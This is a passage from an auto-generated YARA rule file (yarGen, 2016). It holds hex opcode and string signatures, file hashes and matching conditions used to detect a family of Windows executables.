    $op883 = { A1 A8 79 44 00 56 FF 90 08 02 00 00 A1 A8 79 44 }
    $op884 = { 83 7D 0C 02 59 8B F0 59 89 75 F8 75 0D FF 35 C0 }
    $op885 = { 10 FA 42 00 C7 84 24 00 01 00 00 24 FA 42 00 C7 }
    $op886 = { 57 68 00 65 44 00 68 28 65 44 00 56 FF 90 3C 03 }
    $op887 = { 89 75 E8 89 75 EC FF 90 F8 }
    $op888 = { 59 59 85 C0 0F 85 60 05 00 00 68 7C 53 43 00 FF }
    $op889 = { 59 59 85 C0 0F 85 2F 01 00 00 68 20 57 43 00 FF }
    $op890 = { 57 FF 75 08 89 45 D8 A1 A8 79 44 00 FF 90 B8 }
    $op891 = { 59 59 89 45 F8 8B 45 FC FF 30 8B 45 FC 83 C0 04 }
    $op892 = { 59 59 89 45 F8 8B 45 FC FF 30 8B 45 FC 83 C0 04 }
    $op893 = { 57 33 FF 39 7D 7C 0F 84 F5 01 00 00 A1 A8 79 44 }
    $op894 = { 68 1C 5B 43 00 FF 75 88 A1 A8 79 44 00 FF 90 90 }
    $op895 = { 8B 55 14 8B 12 85 D2 0F 8C 1F 01 00 00 0F BF 70 }
    $op896 = { 89 46 04 8B 44 24 18 89 30 83 C4 0C 8B C6 5E C3 }
    $op897 = { 59 59 85 C0 75 36 8B 45 A4 40 50 FF 75 90 FF 75 }
    $op898 = { 34 43 00 C7 84 24 34 04 00 00 10 34 43 00 C7 84 }
    $op899 = { 04 69 43 00 C7 84 24 BC }
    $op900 = { 59 59 85 C0 0F 85 17 02 00 00 68 F4 59 43 00 FF }
    $op901 = { 83 60 04 00 83 20 00 59 59 C3 55 8B EC A1 A8 79 }
    $op902 = { 68 C0 73 44 00 89 45 F0 57 8D 45 F0 50 A1 A8 79 }
    $op903 = { 8B 75 FC A1 A8 79 44 00 6A 00 56 FF 50 64 83 C4 }
    $op904 = { 11 65 40 00 C7 41 64 E7 74 40 00 C7 41 24 1A 74 }
    $op905 = { 59 59 3B C3 74 78 A1 A8 79 44 00 68 C0 E5 43 00 }
    $op906 = { 59 59 85 C0 0F 85 C8 01 00 00 A1 A8 79 44 00 68 }
    $op907 = { 68 74 5C 43 00 FF 75 88 A1 A8 79 44 00 FF 90 90 }
    $op908 = { 59 59 85 C0 0F 85 6F 08 00 00 68 A4 51 43 00 FF }
    $op909 = { 59 59 85 C0 0F 85 17 02 00 00 68 1C 56 43 00 FF }
    $op910 = { FF 35 C8 79 44 00 8B F8 A1 A8 79 44 00 68 84 77 }
    $op911 = { A0 27 43 00 C7 84 24 BC }
    $op912 = { 44 17 43 00 C7 84 24 B0 }
    $op913 = { 98 17 43 00 C7 84 24 C0 }
    $op914 = { 68 6C 5B 43 00 FF 75 88 A1 A8 79 44 00 FF 90 90 }
    $op915 = { 68 7C 58 43 00 FF 75 B8 A1 A8 79 44 00 FF 90 90 }
    $op916 = { FF 44 24 10 8D 47 44 50 A1 A8 79 44 00 FF 90 98 }
    $op917 = { EC 16 43 00 C7 84 24 A0 }
    $op918 = { 4C 43 44 00 C7 84 24 EC }
    $op919 = { 8B 75 10 8B 36 3B F2 0F 8D D5 }
    $op920 = { 68 34 48 43 00 FF 75 08 8B F8 A1 A8 79 44 00 FF }
    $op921 = { 85 C0 75 3C FF 74 24 2C A1 A8 79 44 00 68 30 38 }
    $op922 = { 1D 43 00 C7 84 24 E0 01 00 00 0C 1D 43 00 C7 84 }
    $op923 = { A1 A8 79 44 00 68 60 E5 43 00 53 FF 90 90 }
    $op924 = { F8 68 43 00 C7 84 24 B8 }
    $op925 = { 59 59 81 FF D0 3F 00 00 89 45 F8 89 38 0F 8E B0 }
    $op926 = { FC F7 42 00 C7 84 24 84 }
    $op927 = { FE C3 66 0F B6 C3 59 59 66 3B 45 0C 75 02 32 DB }
    $op928 = { 83 64 24 20 00 89 44 24 28 A1 00 B0 42 00 59 59 }
    $op929 = { 50 A1 A8 79 44 00 56 68 D0 66 43 00 56 53 FF 90 }
    $op930 = { 8B 45 F4 01 45 F0 29 45 EC 83 C4 0C FF 45 FC 8B }
    $op931 = { 83 C4 2C 85 C0 0F 85 2E 03 00 00 FF 75 10 0F B7 }
    $op932 = { 6C 69 43 00 C7 84 24 D0 }
    $op933 = { 59 59 85 C0 0F 85 73 03 00 00 68 D8 54 43 00 FF }
    $op934 = { 9C F8 42 00 C7 84 24 AC }
    $op935 = { A8 16 43 00 C7 84 24 94 }
    $op936 = { FF 45 FC 81 7D FC E8 03 00 00 0F 8F AC }
    $op937 = { E9 AD FE FF FF A1 A8 79 44 00 6A 00 6A FF FF 90 }
    $op938 = { 33 C0 66 89 44 24 2C 8D 7C 24 2E AB 66 AB 68 10 }
    $op939 = { FC 41 44 00 C7 84 24 C0 }
    $op940 = { A1 A8 79 44 00 83 C4 50 FF 75 F8 57 68 E8 C0 43 }
    $op941 = { 59 88 1D AF 79 44 00 FF 05 00 B0 42 00 38 1D AF }
    $op942 = { D4 EE 42 00 C7 84 24 B0 }
    $op943 = { 20 3C 44 00 C7 84 24 D8 }
  condition:
    (uint16(0) == 23117 and filesize < 921600 and (5 of ($s*)) and 1 of ($op*)) or (all of them)
}

rule _370c433dd61ec21d2677cfe02ef93a5f32a2b50d_5bf48d77bade79f2421ae3d258fe8262c043fb8f_08bdf374b28b234e824797145206f4df79eac6ea_1 {
  meta:
    description = "Auto-generated rule - from files 370c433dd61ec21d2677cfe02ef93a5f32a2b50d.codex, 5bf48d77bade79f2421ae3d258fe8262c043fb8f.codex, 08bdf374b28b234e824797145206f4df79eac6ea.codex"
    author = "YarGen Rule Generator"
    reference = "not set"
    date = "2016-07-21"
    super_rule = 1
    hash1 = "29b4498ac81d654b52cd0a32bdf29ed955f046ef9db1e0eba7da47ab2f950a3e"
    hash2 = "84ab50a9e325f64a54d84fb6798d8e74f46c21fd8b935d6c47a44bb140effad9"
    hash3 = "3f326fb6a79842c657efa09b71ce5e46dc110dd324bfabfcd32730d86de0bcf5"
  strings:
    $s1 = ":$:+:2:9:@:G:N:U:\\:s:" ascii fullword
    $s2 = "6%6+606<6H6M6\\6b6g6v6}6" ascii fullword
    $s3 = "8\"8,818;8@8J8O8Y8^8h8m8w8" ascii fullword
    $s4 = "6 6'6.656<6C6J6Q6X6_6f6m6t6" ascii fullword
    $s5 = "4\"4)40474>4E4L4S4Z4a4h4" ascii fullword
    $s6 = "9\"9+91969?9E9J9S9\\9a9j9p9u9~9" ascii fullword
    $s7 = "9\"9'91999C9H9R9W9a9f9p9u9" ascii fullword
    $s8 = "4\"4(4-4<4B4G4S4_4d4s4y4~4" ascii fullword
    $s9 = "6\"6'6,6=6B6G6X6]6b6o6{6" ascii fullword
    $s10 = "?\"?/?4?B?G?L?Y?^?k?p?}?" ascii fullword
    $s11 = "3)31383>3C3L3R3W3c3i3n3w3}3" ascii fullword
    $s12 = ";&;+;5;:;D;I;S;X;b;j;t;y;" ascii fullword
    $s13 = "='=,=6=>=H=M=W=\\=a=m=r=w=" ascii fullword
    $s14 = ":!:*:/:9:>:H:P:Z:_:i:n:x:}:" ascii fullword
    $s15 = "3$3.383B3L3S3Z3a3h3o3v3}3" ascii fullword
    $s16 = "<$<.<3<=<B<L<Q<^<c<m<r<|<" ascii fullword
    $s17 = "31383?3F3M3T3[3b3i3p3w3~3" ascii fullword
    $s18 = "?*?1?8???F?M?T?[?b?i?p?w?" ascii fullword
    $s19 = "9!9(9/969=9D9K9R9Y9`9g9n9x9" ascii fullword
    $s20 = ":$:*:/:8:>:C:L:U:Z:c:i:n:w:|:" ascii fullword
    $op0 = { FC 01 43 00 C7 84 24 F0 }
    $op1 = { A1 D8 60 44 00 68 D0 CD 43 00 53 FF 90 20 03 00 }
    $op2 = { C7 81 9C 03 00 00 0C A6 40 00 C7 81 24 03 00 00 }
    $op3 = { 59 39 5D F8 75 9D 8D 45 FC 50 53 53 53 8D 45 A8 }
    $op4 = { 66 3B D8 75 43 8B C6 2B 45 0C 89 45 FC EB 03 8B }
    $op5 = { 89 5D E4 89 5D E8 FF 90 14 04 00 00 85 C0 7D 07 }
    $op6 = { C8 2A 44 00 C7 84 24 C8 }
    $op7 = { 6C 51 43 00 C7 84 24 98 }
    $op8 = { D8 01 43 00 C7 84 24 E0 }
    $op9 = { 84 A4 42 00 C7 84 24 E4 }
    $op10 = { 59 59 8B 46 04 85 C0 74 12 50 FF 74 24 0C A1 D8 }
    $op11 = { 33 DB 83 C4 20 3B FB 0F 84 A0 }
    $op12 = { 83 C4 18 89 45 FC 83 7D FC 00 0F 84 8F }
    $op13 = { 74 29 44 00 C7 84 24 9C }
    $op14 = { 04 02 43 00 C7 84 24 F4 }
    $op15 = { 50 97 43 00 C7 84 24 D0 }
    $op16 = { 68 FE FF 00 00 FF 75 08 FF 90 04 02 00 00 89 45 }
    $op17 = { 59 FF 75 EC A1 D8 60 44 00 68 0C B1 43 00 56 FF }
    $op18 = { 59 38 5D 0C 0F 84 4E 01 00 00 53 53 57 57 57 56 }
    $op19 = { EC DD 42 00 C7 84 24 D4 }
    $op20 = { A1 D8 60 44 00 8D 5F 10 68 94 C6 43 00 53 FF 90 }
    $op21 = { BF 30 0E 44 00 57 89 4D F0 FF 90 40 02 00 00 59 }
    $op22 = { 24 24 44 00 C7 84 24 AC }
    $op23 = { FF 90 A8 03 00 00 3D 22 00 00 C0 0F 85 86 }
    $op24 = { A1 D8 60 44 00 57 FF 75 08 FF 90 90 01 00 00 33 }
    $op25 = { 59 8D 45 B4 50 A1 D8 60 44 00 FF 90 E0 03 00 00 }
    $op26 = { A1 D8 60 44 00 56 53 FF 74 24 24 FF 90 D4 03 00 }
    $op27 = { 0C DD 42 00 C7 84 24 98 }
    $op28 = { 89 75 EC 89 75 F0 FF 90 A8 03 00 00 F7 D8 1B C0 }
    $op29 = { 88 11 43 00 C7 84 24 C4 }
    $op30 = { 18 24 44 00 C7 84 24 A4 }
    $op31 = { 3C DD 42 00 C7 84 24 A0 }
    $op32 = { 83 C4 0C 89 45 90 FF 75 A4 FF 75 AC 8B 45 90 FF }
    $op33 = { A1 D8 60 44 00 6A 00 68 F0 C8 43 00 FF 75 08 FF }
    $op34 = { 6C 12 43 00 C7 84 24 00 01 00 00 7C 12 43 00 C7 }
    $op35 = { 39 35 04 61 44 00 0F 85 C6 }
    $op36 = { 59 A1 D8 60 44 00 56 6A 00 FF 75 F0 FF 90 D4 03 }
    $op37 = { 54 2B 44 00 C7 84 24 DC }
    $op38 = { A0 29 44 00 C7 84 24 A4 }
    $op39 = { 83 C4 18 89 45 FC 83 7D FC 00 0F 84 04 01 00 00 }
    $op40 = { 8D 45 E0 50 FF 75 F4 A1 D8 60 44 00 FF 90 D8 }
    $op41 = { 59 8D 44 00 02 50 FF 75 14 33 DB 43 53 6A 00 8D }
    $op42 = { 58 DD 42 00 C7 84 24 A8 }
    $op43 = { 53 FF 76 08 8B F8 A1 D8 60 44 00 FF 90 DC }
    $op44 = { 53 FF 76 08 8B F8 A1 D8 60 44 00 FF 90 DC }
    $op45 = { 53 FF 76 08 8B F8 A1 D8 60 44 00 FF 90 DC }
    $op46 = { 54 11 43 00 C7 84 24 B4 }
    $op47 = { 83 C4 20 80 3D E2 60 44 00 00 74 30 FF 74 24 1C }
    $op48 = { FF 76 04 A1 D8 60 44 00 FF 75 FC 53 68 B0 44 44 }
    $op49 = { 59 A1 D8 60 44 00 56 6A 00 53 FF 90 D4 03 00 00 }
    $op50 = { 3D 23 00 00 C0 74 0B 3D 05 00 00 80 0F 85 C7 }
    $op51 = { A1 D8 60 44 00 8B 80 D4 02 00 00 83 C4 0C 3B C3 }
    $op52 = { 83 C4 0C 5F 5E 5B 8B E5 5D C3 55 8B EC 83 EC 28 }
    $op53 = { 68 FC 40 43 00 FF 75 B8 A1 D8 60 44 00 FF 90 20 }
    $op54 = { 8D 47 44 68 8C 4A 43 00 50 A1 D8 60 44 00 FF 90 }
    $op55 = { 50 A1 D8 60 44 00 56 68 60 4D 43 00 56 53 FF 90 }
    $op56 = { 59 32 C0 EB 62 8A 45 10 57 FF 75 0C 88 06 8D 46 }
    $op57 = { 44 E8 42 00 C7 84 24 D8 }
    $op58 = { 50 E7 42 00 C7 84 24 A8 }
    $op59 = { E0 24 44 00 C7 84 24 EC }
    $op60 = { A1 D8 60 44 00 68 A0 C6 43 00 53 FF 90 20 03 00 }
    $op61 = { E0 52 43 00 C7 84 24 D8 }
    $op62 = { 89 5E 10 89 5E 14 FF 90 14 04 00 00 85 C0 74 2A }
    $op63 = { 83 C4 0C 68 FC 69 43 00 8D 45 C0 50 A1 D8 60 44 }
    $op64 = { 83 C4 0C 5E 5F 5B C9 C3 55 8B EC 8B 4D 08 8A 01 }
    $op65 = { 54 A3 42 00 C7 84 24 94 }
    $op66 = { 8B 7C 24 10 A1 D8 60 44 00 83 C7 44 C7 04 24 C8 }
    $op67 = { 59 5F 5E 5B C9 C3 55 8B EC 83 EC 0C A1 D8 60 44 }
    $op68 = { E0 11 43 00 C7 84 24 DC }
    $op69 = { 59 59 84 C0 0F 85 E8 0B 00 00 A1 D8 60 44 00 56 }
    $op70 = { 9C 96 43 00 C7 84 24 A4 }
    $op71 = { C4 00 43 00 C7 84 24 A0 }
    $op72 = { 40 03 C0 50 FF 74 24 14 A1 D8 60 44 00 FF 90 04 }
    $op73 = { 02 72 41 00 C7 81 10 04 00 00 FD 23 41 00 C7 81 }
    $op74 = { 83 C4 0C 8B 45 FC 8B 4D F4 89 08 68 81 }
    $op75 = { 59 8D 45 F4 50 A1 D8 60 44 00 FF 90 B8 03 00 00 }
    $op76 = { 1A 9F 41 00 C7 81 FC 03 00 00 21 22 41 00 C7 81 }
    $op77 = { 83 C4 10 EB 02 33 C0 5B 5F 5E 5D C3 55 8B EC 83 }
    $op78 = { F0 E7 42 00 C7 84 24 CC }
    $op79 = { 6A 08 59 33 C0 89 7D CC 8D 7D D0 F3 AB 8D 45 F4 }
    $op80 = { 83 C4 20 8D 44 24 18 50 A1 D8 60 44 00 FF 90 B8 }
    $op81 = { 59 8D 44 00 02 50 53 6A 01 56 8D 45 EC 50 FF 75 }
    $op82 = { 59 8D 44 00 02 50 53 6A 01 56 8D 45 EC 50 FF 75 }
    $op83 = { 83 C4 2C A1 D8 60 44 00 57 68 9C A9 43 00 68 C0 }
    $op84 = { 59 5F 5E C9 C3 A1 D8 60 44 00 6A 00 FF 74 24 0C }
    $op85 = { 59 A1 D8 60 44 00 56 FF 90 DC 02 00 00 A1 D8 60 }
    $op86 = { 94 2B 44 00 C7 84 24 E4 }
    $op87 = { FF 37 A1 D8 60 44 00 FF 90 98 }
    $op88 = { FF 37 A1 D8 60 44 00 FF 90 98 }
    $op89 = { 34 12 43 00 C7 84 24 F4 }
    $op90 = { BC A4 42 00 C7 84 24 F8 }
    $op91 = { A1 D8 60 44 00 57 FF 90 98 }
    $op92 = { 85 C0 75 07 8B 45 CC 48 89 45 CC FF 75 BC FF 75 }
    $op93 = { A1 D8 60 44 00 68 E0 CD 43 00 53 FF 90 20 03 00 }
    $op94 = { 70 E8 42 00 C7 84 24 E4 }
    $op95 = { 60 96 43 00 C7 84 24 90 }
    $op96 = { D8 23 44 00 C7 84 24 88 }
    $op97 = { 83 C4 0C 68 44 42 43 00 FF 75 88 A1 D8 60 44 00 }
    $op98 = { 83 C4 0C 8D 45 DC 50 56 8D 45 FC 50 A1 D8 60 44 }
    $op99 = { 8D 45 DC 50 68 00 01 08 00 8D 45 FC 50 A1 D8 60 }
    $op100 = { 83 C4 14 89 45 F4 FF 75 F0 FF 75 08 A1 D8 60 44 }
    $op101 = { 30 51 43 00 C7 84 24 90 }
    $op102 = { FF 75 FC A1 D8 60 44 00 56 FF 90 E4 03 00 00 FF }
    $op103 = { 89 5C 24 5C 89 5C 24 60 FF 90 A8 03 00 00 85 C0 }
    $op104 = { 1C 25 44 00 C7 84 24 00 01 00 00 28 25 44 00 C7 }
    $op105 = { 59 A1 D8 60 44 00 56 6A 00 57 FF 90 D4 03 00 00 }
    $op106 = { 7B 43 00 C7 84 24 A8 06 00 00 10 7B 43 00 C7 84 }
    $op107 = { 8B 4D FC 8B 04 81 05 04 10 00 00 50 A1 D8 60 44 }
    $op108 = { 81 F9 D0 3F 00 00 0F 8E 96 }
    $op109 = { A1 D8 60 44 00 68 04 46 44 00 57 FF 50 40 59 59 }
    $op110 = { E9 34 FE FF FF 55 8B EC 83 EC 74 6A 1D 8D 45 8C }
    $op111 = { 88 97 43 00 C7 84 24 E4 }
    $op112 = { 10 2A 44 00 C7 84 24 B0 }
    $op113 = { 10 51 43 00 C7 84 24 88 }
    $op114 = { 83 C4 0C 5F 5E 5B 8B E5 5D C3 55 8B EC 83 EC 14 }
    $op115 = { B4 DD 42 00 C7 84 24 C4 }
    $op116 = { 20 97 43 00 C7 84 24 C4 }
    $op117 = { 8B 50 24 56 85 D2 0F 8E E2 }
    $op118 = { 8C A4 42 00 C7 84 24 E8 }
    $op119 = { E0 28 44 00 C7 84 24 88 }
    $op120 = { F6 1C 40 00 C7 41 2C BB 58 41 00 C7 81 10 03 00 }
    $op121 = { 08 11 43 00 C7 84 24 A0 }
    $op122 = { 83 C4 0C 5B 5F 5E C9 C3 55 8B EC 83 EC 34 83 65 }
    $op123 = { FC A2 42 00 C7 84 24 84 }
    $op124 = { 4C 53 43 00 C7 84 24 E4 }
    $op125 = { C6 05 C1 60 44 00 01 89 2D CC 60 44 00 89 25 C8 }
    $op126 = { C6 05 C1 60 44 00 01 89 2D CC 60 44 00 89 25 C8 }
    $op127 = { A0 24 44 00 C7 84 24 D8 }
    $op128 = { E9 5F FE FF FF A1 D8 60 44 00 53 57 68 64 A0 42 }
    $op129 = { 4C A5 40 00 C7 41 14 3C 57 41 00 C7 81 9C 02 00 }
    $op130 = { 81 43 00 C7 84 24 78 08 00 00 0C 81 43 00 C7 84 }
    $op131 = { C0 96 43 00 C7 84 24 AC }
    $op132 = { 44 24 44 00 C7 84 24 B8 }
    $op133 = { FF 74 24 10 A1 D8 60 44 00 53 FF 90 90 01 00 00 }
    $op134 = { FF 74 24 10 A1 D8 60 44 00 53 FF 90 90 01 00 00 }
    $op135 = { 44 11 43 00 C7 84 24 B0 }
    $op136 = { F0 23 44 00 C7 84 24 90 }
    $op137 = { 18 11 43 00 C7 84 24 A4 }
    $op138 = { 74 43 00 C7 84 24 C0 04 00 00 14 74 43 00 C7 84 }
    $op139 = { 83 C4 18 89 45 FC 83 7D FC 00 75 2A 68 80 }
    $op140 = { CC DD 42 00 C7 84 24 CC }
    $op141 = { 59 5B 5F 5E C9 C3 55 8B EC 53 56 33 F6 33 DB 33 }
    $op142 = { B0 DE 42 00 C7 84 24 FC }
    $op143 = { FC 11 43 00 C7 84 24 E4 }
    $op144 = { FC 10 43 00 C7 84 24 9C }
    $op145 = { 8C 74 40 00 C7 41 08 50 1E 41 00 C7 81 E0 }
    $op146 = { A1 D8 60 44 00 89 5D FC FF 50 10 89 45 F8 A1 D8 }
    $op147 = { 2C 53 43 00 C7 84 24 E0 }
    $op148 = { 88 52 43 00 C7 84 24 CC }
    $op149 = { B0 28 44 00 C7 84 24 84 }
    $op150 = { 83 C4 10 89 45 08 85 C0 75 1B 39 45 FC 0F 84 5D }
    $op151 = { F4 52 43 00 C7 84 24 DC }
    $op152 = { 50 DE 42 00 C7 84 24 EC }
    $op153 = { 09 43 00 C7 84 24 70 02 00 00 14 09 43 00 C7 84 }
    $op154 = { 8B 4E 24 85 C9 0F 84 E6 }
    $op155 = { 14 25 44 00 C7 84 24 FC }
    $op156 = { D8 10 43 00 C7 84 24 90 }
    $op157 = { 89 5C 24 64 89 5C 24 68 FF 90 A8 03 00 00 85 C0 }
    $op158 = { 89 5C 24 64 89 5C 24 68 FF 90 A8 03 00 00 85 C0 }
    $op159 = { 0F 82 5A FF FF FF 5F 5E 8B E5 5D C3 56 8B 74 24 }
    $op160 = { 10 40 00 C7 81 9C 01 00 00 A1 A0 41 00 C7 81 24 }
    $op161 = { 6C 24 44 00 C7 84 24 C8 }
    $op162 = { 54 2A 44 00 C7 84 24 BC }
    $op163 = { 83 C4 14 E9 65 02 00 00 F6 45 14 41 75 15 8B 45 }
    $op164 = { 3D 22 00 00 C0 74 07 32 C0 E9 C8 }
    $op165 = { B4 51 43 00 C7 84 24 A4 }
    $op166 = { B0 96 43 00 C7 84 24 A8 }
    $op167 = { A1 D8 60 44 00 56 53 FF 74 24 20 FF 90 D4 03 00 }
    $op168 = { 59 39 74 24 1C 74 2C FF 74 24 18 A1 D8 60 44 00 }
    $op169 = { 83 C4 18 84 C0 0F 84 9F 02 00 00 FF 75 10 0F B7 }
    $op170 = { 8B 4F 3A 89 45 F8 8D 44 01 04 B9 64 62 00 00 66 }
    $op171 = { 6E 43 00 C7 84 24 28 03 00 00 08 6E 43 00 C7 84 }
    $op172 = { 89 4D A4 FF 90 38 01 00 00 8D 45 DC 89 45 BC 8D }
    $op173 = { A1 D8 60 44 00 68 C0 30 43 00 FF 75 08 FF 90 44 }
    $op174 = { C8 97 43 00 C7 84 24 00 01 00 00 D8 97 43 00 C7 }
    $op175 = { A5 42 00 C7 84 24 08 01 00 00 10 A5 42 00 C7 84 }
    $op176 = { 59 FF 74 24 20 A1 D8 60 44 00 56 53 FF 90 64 02 }
    $op177 = { 9C E8 42 00 C7 84 24 F0 }
    $op178 = { 13 A2 40 00 89 81 80 01 00 00 C7 41 50 64 5A 40 }
    $op179 = { A1 D8 60 44 00 53 FF 75 08 FF 90 04 02 00 00 68 }
    $op180 = { 96 14 41 00 C7 81 B4 01 00 00 26 B1 40 00 C7 81 }
    $op181 = { FF 76 04 A1 D8 60 44 00 FF 75 FC 53 68 D0 44 44 }
    $op182 = { 83 C4 0C FF 75 BC FF 75 BC 0F B7 05 E8 60 44 00 }
    $op183 = { FF 75 F8 A1 D8 60 44 00 FF 75 08 FF 90 90 01 00 }
    $op184 = { 8B 46 3A FF 75 0C 03 C7 8B 40 10 05 04 10 00 00 }
    $op185 = { 8B 41 3C 3B C3 0F 84 E0 }
    $op186 = { 68 10 41 43 00 FF 75 B8 A1 D8 60 44 00 FF 90 20 }
    $op187 = { C0 97 43 00 C7 84 24 FC }
    $op188 = { 6A 41 8D 45 D0 5F 89 45 F8 C7 45 F0 20 }
    $op189 = { 80 75 15 83 78 08 00 74 0F A1 D8 60 44 00 57 56 }
    $op190 = { 80 97 43 00 C7 84 24 E0 }
    $op191 = { 98 43 00 C7 84 24 10 01 00 00 0C 98 43 00 C7 84 }
    $op192 = { 18 43 00 C7 84 24 7C 02 00 00 0C 18 43 00 C7 84 }
    $op193 = { 68 98 40 43 00 FF 75 B8 A1 D8 60 44 00 FF 90 20 }
    $op194 = { 03 C0 2B 45 C8 59 03 45 F8 83 E0 FE 83 F8 0C 75 }
    $op195 = { 8B D8 59 59 85 DB 0F 84 8D }
    $op196 = { 83 C4 20 85 FF 75 05 83 C8 FF EB 25 8B 46 3A 8D }
    $op197 = { C8 53 43 00 C7 84 24 F4 }
    $op198 = { A1 D8 60 44 00 68 78 22 44 00 56 FF 90 F0 }
    $op199 = { 83 C4 14 5E 32 C0 5B C9 C3 55 8B EC 83 EC 24 A1 }
    $op200 = { 83 C4 0C EB 65 E8 2A C2 00 00 3D 0D 00 00 C0 E9 }
    $op201 = { 68 68 2C 43 00 50 A1 D8 60 44 00 57 FF 90 2C 03 }
    $op202 = { 04 E7 42 00 C7 84 24 94 }
    $op203 = { 83 C4 30 FF 45 F8 47 FF 4D F0 0F 85 5A FF FF FF }
    $op204 = { A1 D8 60 44 00 68 EC CD 43 00 53 FF 90 20 03 00 }
    $op205 = { 83 64 24 18 00 C7 05 00 A0 42 00 22 27 00 00 8B }
    $op206 = { 8C A3 42 00 C7 84 24 A0 }
    $op207 = { 68 5C 2B 43 00 50 A1 D8 60 44 00 53 FF 90 2C 03 }
    $op208 = { 8B F0 8D 45 F8 50 A1 D8 60 44 00 FF 90 B8 03 00 }
    $op209 = { A1 D8 60 44 00 68 48 46 44 00 57 FF 50 40 59 59 }
    $op210 = { 59 8D 44 24 50 50 A1 D8 60 44 00 FF 90 E0 03 00 }
    $op211 = { FF 75 14 8B 45 FC 83 C0 04 50 FF 75 0C A1 D8 60 }
    $op212 = { 89 75 B8 89 75 BC FF 90 A8 03 00 00 85 C0 0F 85 }
    $op213 = { A1 D8 60 44 00 FF 74 24 34 68 10 69 43 00 56 FF }
    $op214 = { 83 C4 14 89 45 F8 FF 75 EC FF 75 08 A1 D8 60 44 }
    $op215 = { 0C 25 44 00 C7 84 24 F8 }
    $op216 = { 80 DE 42 00 C7 84 24 F4 }
    $op217 = { A1 D8 60 44 00 53 68 00 08 00 00 FF 75 08 FF 90 }
    $op218 = { 89 5D E0 89 5D E4 FF 90 14 04 00 00 89 45 0C 3D }
    $op219 = { 8B 4F 3A 8B 55 F8 83 65 FC 00 89 45 F4 05 00 F0 }
    $op220 = { 15 43 00 C7 84 24 B4 01 00 00 10 15 43 00 C7 84 }
    $op221 = { 1B 44 00 C7 84 24 98 02 00 00 18 1B 44 00 C7 84 }
    $op222 = { 83 C4 10 84 C0 0F 85 03 0C 00 00 A1 D8 60 44 00 }
    $op223 = { 83 C0 08 3B C3 0F 84 AB }
    $op224 = { 34 2C 44 00 C7 84 24 00 01 00 00 44 2C 44 00 C7 }
    $op225 = { 83 C4 18 8D 45 F0 50 A1 D8 60 44 00 FF 90 F8 }
    $op226 = { FF 44 24 14 8D 47 44 50 A1 D8 60 44 00 FF 90 08 }
    $op227 = { A1 D8 60 44 00 68 B4 2E 43 00 56 53 FF 90 30 02 }
    $op228 = { 9C 52 43 00 C7 84 24 D0 }
    $op229 = { B8 A0 60 44 00 BF 34 A0 42 00 2B C7 89 45 E4 0F }
    $op230 = { 5C 01 43 00 C7 84 24 BC }
    $op231 = { 83 C4 14 85 C0 74 0C C7 46 10 02 }
    $op232 = { 83 7D 0C 00 75 05 E9 90 }
    $op233 = { 14 E7 42 00 C7 84 24 98 }
    $op234 = { F1 1C 41 00 C7 81 2C 02 00 00 B3 1F 41 00 C7 81 }
    $op235 = { A1 D8 60 44 00 56 FF 75 0C FF 90 98 }
    $op236 = { 83 C4 0C FF 75 FC FF 75 08 A1 D8 60 44 00 FF 90 }
    $op237 = { 83 C4 0C FF 75 FC FF 75 08 A1 D8 60 44 00 FF 90 }
    $op238 = { 83 C4 0C FF 75 FC FF 75 08 A1 D8 60 44 00 FF 90 }
    $op239 = { 0C 29 44 00 C7 84 24 8C }
    $op240 = { 40 97 43 00 C7 84 24 CC }
    $op241 = { 6E 1A 41 00 C7 81 64 01 00 00 CB C7 40 00 C7 81 }
    $op242 = { D8 2A 44 00 C7 84 24 CC }
    $op243 = { 64 24 44 00 C7 84 24 C4 }
    $op244 = { 83 C4 18 89 45 FC 83 7D FC 00 74 6C 8B 45 FC 81 }
    $op245 = { 89 75 D8 89 4D DC 89 75 E4 89 75 E8 FF 90 14 04 }
    $op246 = { 03 C0 2B 45 CC 59 03 45 F8 83 E0 FE 83 F8 08 74 }
    $op247 = { EC 2B 44 00 C7 84 24 F4 }
    $op248 = { 50 A1 D8 60 44 00 FF 90 A4 02 00 00 83 C4 18 A1 }
    $op249 = { 6F 43 00 C7 84 24 64 03 00 00 0C 6F 43 00 C7 84 }
    $op250 = { 8B 75 0C 8B 50 04 8B 4F 3A 83 C4 0C 89 45 D0 89 }
    $op251 = { 7C A4 42 00 C7 84 24 E0 }
    $op252 = { 8B 45 FC 0F B7 40 04 83 F8 25 0F 85 D9 }
    $op253 = { 7C E7 42 00 C7 84 24 B0 }
    $op254 = { 89 75 E8 89 75 EC FF 90 80 03 00 00 5F 8B 45 FC }
    $op255 = { 89 45 F0 8D 45 D0 50 A1 D8 60 44 00 FF 90 B8 03 }
    $op256 = { E4 23 44 00 C7 84 24 8C }
    $op257 = { 5C 12 43 00 C7 84 24 FC }
    $op258 = { FF 76 04 A1 D8 60 44 00 FF 75 FC 53 68 8C 44 44 }
    $op259 = { CC E8 42 00 C7 84 24 FC }
    $op260 = { 83 C4 0C 8D 5C 43 02 A1 D8 60 44 00 57 FF 90 98 }
    $op261 = { F4 A3 42 00 C7 84 24 B4 }
    $op262 = { 83 C4 14 89 45 FC FF 75 F8 FF 75 08 A1 D8 60 44 }
    $op263 = { 83 C4 18 83 64 24 0C 00 C7 44 24 38 A8 12 44 00 }
    $op264 = { 16 41 00 8B 15 1C 90 42 00 89 91 18 04 00 00 8B }
    $op265 = { BC 2B 44 00 C7 84 24 E8 }
    $op266 = { EC 10 43 00 C7 84 24 98 }
    $op267 = { 57 68 30 4C 44 00 68 58 4C 44 00 56 FF 50 24 A1 }
    $op268 = { 68 E8 41 43 00 FF 75 B8 A1 D8 60 44 00 FF 90 20 }
    $op269 = { CC A4 42 00 C7 84 24 FC }
    $op270 = { 50 24 44 00 C7 84 24 BC }
    $op271 = { 8F 43 00 C7 84 24 78 0C 00 00 10 8F 43 00 C7 84 }
    $op272 = { 59 03 C0 50 8D 85 00 FE FF FF 50 68 C0 69 43 00 }
    $op273 = { 0F AF 45 9C 8D 70 08 A1 D8 60 44 00 56 FF 75 0C }
    $op274 = { EC 53 43 00 C7 84 24 00 01 00 00 FC 53 43 00 C7 }
    $op275 = { 56 FF 75 08 8A D8 A1 D8 60 44 00 FF 90 90 01 00 }
    $op276 = { 66 3B D8 74 0A 46 46 0F B7 06 66 85 C0 75 D3 33 }
    $op277 = { 83 C4 14 5F 5E 5B 8B E5 5D C3 CC CC CC CC CC CC }
    $op278 = { A1 D8 60 44 00 68 2C 46 44 00 57 FF 50 40 59 59 }
    $op279 = { C8 01 43 00 C7 84 24 DC }
    $op280 = { A8 2A 44 00 C7 84 24 C4 }
